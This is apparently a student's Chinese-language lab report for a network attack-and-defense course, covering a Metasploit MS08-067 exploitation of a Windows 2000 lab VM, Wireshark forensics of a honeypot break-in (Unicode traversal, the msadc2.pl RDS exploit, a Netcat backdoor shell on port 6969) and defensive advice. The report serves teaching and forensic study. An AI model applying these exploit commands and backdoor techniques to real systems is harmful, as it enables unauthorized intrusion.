20253918 2025-2026-2 《网络攻防实践》第6次作业

20253918 2025-2026-2 《网络攻防实践》第6次作业

1.实践内容

本次实践围绕 Windows 操作系统安全攻防 展开，主要包括 Windows 远程渗透攻击、NT 系统攻击流量取证分析和团队对抗实践三个部分。通过漏洞利用、远程控制、抓包分析和问题排查，理解 Windows 系统常见漏洞的攻击方式、取证方法与防护思路。

1.1 Windows 远程渗透攻击实践

本部分以 Kali 作为攻击机，Win2Kserver 作为靶机，使用 Metasploit Framework 对 Windows 系统进行远程渗透实验。实验过程中，先启动 msfconsole，搜索并选择 ms08_067_netapi 漏洞模块，再配置目标主机地址、攻击载荷和相关参数，最终对靶机发起攻击并获取命令行访问权限。

在成功进入目标系统后，通过执行 ipconfig、mkdir、cd、echo 等命令，验证攻击者已经能够查看目标主机网络信息、创建目录和写入文件。同时使用 Wireshark 对攻击过程进行抓包，观察攻击机与靶机之间的通信流量，从而将漏洞利用过程与网络数据包分析结合起来。

1.2 NT 系统攻击取证分析实践

本部分主要对一次成功的 NT 系统破解攻击进行流量取证分析。通过将实验数据文件转换为 pcap 格式，并使用 Wireshark 过滤攻击者与蜜罐主机之间的通信，逐步还原攻击者的攻击过程。

分析过程中，首先观察攻击者对目标 Web 服务的访问和探测行为；随后根据 %C0%AF 特征判断其存在 Unicode 目录穿越攻击；再结合 /msadc/msadcs.dll/AdvancedDataFactory.Query、!ADM!ROX!YOUR!WORLD! 等特征，判断攻击者使用了 msadc2.pl 渗透攻击代码，利用 IIS 的 MSADC/RDS 漏洞执行系统命令。之后，攻击者尝试通过 FTP 下载工具，并利用 Netcat 在目标主机 6969 端口建立后门 shell，实现对系统的远程控制。

通过该部分实践，重点学习了如何根据 IP 地址、URL 路径、特殊编码、特征字符串和 TCP 流内容，判断攻击工具、攻击过程、攻击目的以及攻击者后续行为。

1.3 团队对抗与防守分析实践

本部分通过两台电脑进行团队对抗实验，将 Kali 和 Win2Kserver 设置在同一局域网环境下，一方作为攻击方，另一方作为防守方。实验中先完成桥接网络配置和 IP 连通性测试，再使用 Metasploit 加载 ms08_067_netapi 模块，对对方 Windows 靶机进行远程渗透。

攻击成功后，在目标主机中创建目录并写入文本文件，用于验证已经获得远程命令执行权限。防守方则使用 Wireshark 监听网络通信，通过 IP 过滤和 TCP 流追踪分析攻击行为，从防守角度观察漏洞利用和远程控制过程。

2.实践过程

2.1 动手实践Metasploit windows attacker

选取Win2Kserver作为靶机，kali作为攻击机进行试验

输入命令msfconsole进入metasploitable frame work。

在 Kali 中启动 msfconsole，说明已经进入 Metasploit Framework 环境，准备开始漏洞利用实验。

输入命令search ms08_067

在 Metasploit 中搜索 ms08_067 相关模块，找到了针对 Windows SMB 的 ms08_067_netapi 漏洞利用模块。展示了该漏洞模块支持的多个目标系统版本，说明该模块可以适配不同版本的 Windows 靶机。

使用命令 use windows/smb/ms08_067_netapi 进入漏洞工作目录以及命令 show options 查看漏洞攻击前所需的设置

这张图表示已经选用了 windows/smb/ms08_067_netapi`模块，并查看了模块参数配置项，包括目标地址、端口、回连地址等内容。

使用命令show payloads 显示漏洞载荷

选择其中的第三个进行攻击：

输入命令 set payload 3设置载荷。
输入命令 set RHOST 192.168.200.133设置攻击主机地址。
输入命令 set LHOST 192.168.200.64 设置攻击机地址。

wireshark 监听攻击过程

在 Wireshark 中抓取攻击机与靶机之间的 TCP 通信数据，说明实验不仅完成了渗透，还对通信过程进行了抓包分析。

在成功获取的命令行中执行了 ipconfig，查看到了目标主机的 IP、子网掩码和网关信息，进一步验证了已经拿到系统访问权限。

在目标主机上继续执行了 echo、mkdir zyy、cd zyy 等命令，说明不仅进入了目标系统，而且已经可以进行基本的远程命令操作与目录管理。至此，实验成功结束。

2.2 取证分析实践：解码一次成功的NT系统破解攻击

下载学习通上的文件demo_NT_attack_data.zip，解压后把里面的文件后缀从.log改成.pcap，打开文件

过滤出ip为ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106如下图所示：

图中使用 Wireshark 过滤出攻击者 213.116.251.162 与蜜罐主机 172.16.1.106 之间的通信。可以看到攻击者正在访问目标主机的 Web 服务，请求了 /、/rfp.gif、/rfptop.gif 等资源，说明攻击者先进行了网页访问和服务探测。

在117HTTP数据包中可以看到有特殊字符%C0%AF，该字符在Unicode编码中对应符号/，进而可以分析得到为Unicode攻击。攻击者利用Unicode攻击访问boot.ini文件

寻找140数据包，发现攻击者希望获得msadcs.dll文件。

请求内容中出现了典型特征字符串：!ADM!ROX!YOUR!WORLD!

攻击者使用的是 msadc2.pl 渗透攻击代码。该攻击代码利用 Microsoft IIS 的 MSADC/RDS 组件漏洞，通过访问 msadcs.dll 和调用示例数据库 btcustmr.mdb，构造恶意 SQL 查询，使服务器执行 cmd /c 系统命令，从而获得远程命令执行能力。

可以看到攻击者尝试登录 FTP，这些文件通常用于密码哈希获取和远程控制，说明攻击者试图在目标主机上部署后续攻击工具，但是这里攻击者FTP登录失败。

而在后面攻击者建立了FTP连接。

使用 Netcat（nc）在目标主机 6969 端口开启监听，并把连接绑定到 cmd1.exe 命令行，从而建立一个远程后门 shell，方便攻击者后续直接连接并控制系统。

接下来使用tcp.port == 6969进行过滤内容。

攻击者通过一系列的手段进行攻击，包括查看修改删减文件，查看用户内容等多种攻击手段。

综上所述，总结问题：

1.攻击者使用了什么破解工具进行攻击？

攻击者使用的是 msadc2.pl 渗透攻击代码。依据是流量中出现了 !ADM!ROX!YOUR!WORLD! 特征字符串，并访问了 /msadc/msadcs.dll/AdvancedDataFactory.Query，说明其利用的是 IIS 的 MSADC/RDS 远程命令执行漏洞。

2.攻击者如何使用这个破解工具进入并控制了系统？

攻击者先访问目标 Web 服务进行探测，然后利用 msadc2.pl 访问 msadcs.dll，通过构造恶意查询让服务器执行 cmd /c 命令。之后又利用 Netcat，在目标主机 6969 端口开启后门 shell，并绑定到 cmd1.exe，从而远程控制系统。

3.攻击者获得系统访问权限后做了什么？

攻击者获得权限后，尝试通过 FTP 下载攻击工具，并进一步进行文件查看、文件修改、文件删除、用户信息查看等操作。根据截图内容，还可以判断其进行了系统目录、用户账号和文件内容的探查。

4.我们如何防止这样的攻击？

应及时修补 Windows NT/IIS 的 MSADC/RDS 漏洞，禁用不必要的 /msadc/ 组件和脚本执行权限；同时限制 Web 服务账号权限，关闭服务器不必要的外连能力，并使用防火墙、IDS/IPS 检测 msadcs.dll、%C0%AF、cmd.exe、nc.exe 等异常访问特征。

5.攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？

是的，攻击者已经警觉目标可能是实验服务器或蜜罐主机。依据是攻击者后续留下了类似 “I know that this is a lab server, but patch the holes” 的提示信息，说明他意识到目标并非普通生产主机，而是实验环境或蜜罐。

2.3 团队对抗实践：windows系统远程渗透攻击和分析

这个实验我和李承宸同学的电脑进行团队对抗实验。首先打开热点，我们两台电脑都连接这个热点；然后编辑我们的kali以及win2kServer，设置成桥接模式，勾选上复制物理地址连接状态。

把win2kServer的网络连接也要改为自动获取IP地址。

修改好后，我和李承宸同学的电脑配置如下所示：

我本人的：

李承宸同学的：

kali：192.168.43.7
win2k：192.168.43.206

首先我使用我的kali去ping李承宸同学的win2k机器

结果显示可以ping通，说明网络没有问题，在同一个局域网内部。

输入命令msfconsole，启动Metasploit框架控制台。连续输入命令use exploit/windows/smb/ms08_067_netapi和show payloads。

紧接着连续输入以下三条命令：set payload generic/shell_reverse_tcp、set LHOST 192.168.43.188、set RHOST 192.168.43.206。

再输入命令show options，最后输入命令exploit开始攻击。

那么现在我们开始进行攻击李承宸同学的win2k：

输入命令mkdir ZYY_att_LCC在对方主机中创建文件夹

输入命令cd ZYY_att_LCC进入该文件夹

输入命令echo Hi LCC,I am ZYY.>>Test.txt在对方主机中创建一个Test.txt文件并留言，结果如下所示：

最后测试防御系统，在李承宸同学的kali机上打开wireshark软件，过滤ip.addr == 192.168.43.188 and ip.addr == 192.168.43.206

追踪tcp流，可以追踪到行踪，到此团队实践任务结束。

3.学习中遇到的问题及解决

3.1 问题一：攻击一直无法成功获取目标主机访问权限的问题

在使用 Metasploit 对 Windows Metasploitable 靶机的 MS08-067 漏洞进行远程渗透攻击时，原本应选择第 3 个 payload：payload/generic/shell_bind_tcp

但实验中误选了第 4 个 payload：payload/generic/shell_reverse_tcp

由于攻击方式不同，导致连接方式、监听方向和参数配置不一致，最终出现攻击一直无法成功获取目标主机访问权限的问题。

查阅资料后发现的具体问题：

本次问题的根本原因是 payload 选择错误。第 3 个 shell_bind_tcp 是靶机监听、攻击机连接；第 4 个 shell_reverse_tcp 是靶机主动回连攻击机。由于两者连接方向不同，配置要求也不同，误选 reverse shell 后，如果网络或监听参数不正确，就会导致攻击失败。解决方法是按照实验要求选择第 3 个 shell_bind_tcp，重新配置参数后再次执行攻击。

3.2 问题二：更换桥接模式后一直无法显示所有的ip地址

在将虚拟机网络更换为桥接模式后，Kali 中执行 ifconfig 只能看到本地回环地址 127.0.0.1 和部分网卡信息，无法正常获取完整 IP 地址。后续发现，如果连接的是校园网，桥接模式下容易无法正常分配 IP；而切换到手机热点后，虚拟机可以正常获取 IP。

查阅资料后得知，主要原因是校园网通常存在设备认证、MAC 地址绑定、网络准入控制或 DHCP 限制。虚拟机在桥接模式下会被校园网识别为一台新的独立设备，但校园网可能不允许该虚拟网卡直接获取 IP 地址，因此导致桥接后无法正常联网或无法显示有效 IP。

4.学习感想和体会

通过本次 Windows 操作系统安全攻防实践，我对漏洞利用、远程渗透和流量取证分析有了更加直观的认识。在 Metasploit 实验中，我了解了漏洞模块、payload、RHOST、LHOST 等参数之间的关系，也体会到一个配置错误就可能导致攻击失败。在 NT 攻击取证分析中，我学会了通过 Wireshark 过滤 IP、追踪 TCP 流、分析特殊字符串和命令痕迹，还原攻击者的入侵过程。团队对抗实验则让我进一步理解了攻防双方的关系，攻击并不是目的，更重要的是通过攻击过程发现系统薄弱点，并思考如何修补漏洞、加强防护。整体来看，本次实践提高了我的动手能力，也让我认识到网络安全学习必须结合实际操作，只有真正分析过攻击过程，才能更好地理解防御的重要性。